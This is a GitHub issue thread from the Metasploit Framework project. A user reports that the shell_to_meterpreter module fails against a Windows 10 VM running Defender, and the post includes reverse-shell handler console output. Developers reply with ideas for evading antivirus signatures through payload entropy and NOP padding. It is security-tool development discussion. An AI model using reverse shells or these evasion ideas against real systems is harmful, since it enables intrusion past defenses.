Metasploit-framework: issue multi/manage/shell_to_meterpreter

Created on 16 May 2019  路  3Comments  路  Source: rapid7/metasploit-framework

i opened shell session via Win10 pro full update and active windows defender(VM), for exp;

msf5 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp
payload => windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on xxx.xxx.xxx.xxx:4040 
[*] Command shell session 1 opened (xxx.xxx.xxx.xxx:4040 -> xxx.xxx.xxx.xxx:52213) at 2019-05-16 00:51:53 -0700
PS C:\Users\vera\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads> ^Z
Background session 1? [y/N]  y 
 1         shell x64/windows  Windows PowerShell running as vera@DESKTOP-EKE2DH1 
PS C:\Users\vera\AppData\Loc.......
type : session -u 1
after i try to post(multi/manage/shell_to_meterpreter)
everything seems works fine, for exp;

[*] Command stager progress: 99.78% (101888/102108 bytes)
[*] Command stager progress: 100.00% (102108/102108 bytes)
msf5 post(multi/manage/shell_to_meterpreter) >
but when i type session -l, 
there is just active sessions 1, dont upgrade meterpreter sessions, for exp;

[*] Command stager progress: 99.78% (101888/102108 bytes)
[*] Command stager progress: 100.00% (102108/102108 bytes)
msf5 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type               Information                                                                       Connection
  --  ----  ----               -----------                                                                       ----------
  1         shell x64/windows  Windows PowerShell running as vera@DESKTOP-EKE2DH

i am using kali lunix(4.19.0-kali5-amd64) via apt, and Framework Version: 5.0.21-dev

thx for advice...

question

All 3 comments

In this case maybe defender isn't catching the shell session but it is catching the meterpreter execuatable when it gets downloaded.

IMHO, we should make the block_rc4 stuff higher entropy and start using it as default for any clear text session upgrade. If the key offsets are moving around the asm, it'll be a lot more annoying for them to check for known bytes at known offsets.
That said, the api resolver block is also signed for by more and more vendors, and needs a similar treatment (discussed w/ @wvu-r7 already - the bapi asm is quite neatly labeled leaving lots of room for Rex NOPs).

@sempervictus, that's an interesting thought, and it would be relatively straight-forward. I don't want to hijack this thread, but I'd be curious about how much we could/would need to add. I'd also love to hear @wchen-r7's opinion on this....

Was this page helpful?
0 / 5 - 0 ratings